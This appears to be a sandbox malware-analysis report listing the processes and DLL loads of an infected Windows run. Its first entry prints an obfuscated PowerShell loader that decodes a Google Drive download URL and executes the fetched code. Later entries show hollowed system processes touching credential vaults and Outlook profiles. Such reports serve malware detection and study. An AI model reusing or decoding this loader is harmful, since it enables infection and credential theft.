Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe" Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595475474.0000000007079000.00000004.00000020.00020000.00000000.sdmp
